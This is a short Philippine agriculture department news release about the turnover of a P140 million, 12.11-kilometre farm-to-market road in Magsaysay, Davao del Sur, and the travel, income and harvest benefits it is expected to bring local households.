Just in time of the 52nd town anniversary of Magsaysay, Davao del Sur, Department of Agriculture in Davao Region (DA-XI) thru the Philippine Rural Development Project (PRDP) turnover the P140 million worth of farm to market road (FMR) project.

The 12.11 kilometer road rehabilitation project connects barangays Barayong-Mabini-Bala and Upper Bala.

Project beneficiaries are expected to experience 50% reduction of the travel time and cost from the farm going to the market, from the usual 60 minutes to 30 minutes, and from P60.00 to P30.00. This will also entail increase in traffic count by 60% due to its better road access.

The said project is expected to increase household income among the residents and would provide better access both to the people and reduce post-harvest losses when transporting their produce.

Social delivery in the influence area will be much faster and locals no longer have to clamor about their struggle during times of emergency.

Generally, the project will facilitate access for the development and enhancement of the whole value chain of the commodity from input provision, farming processing to marketing which will hasten economic growth in the influence area. A total of 3,050 household or 13,116 individual beneficiaries now benefit from this project.(Che D. Palicte, RAFIS11/Joy M.
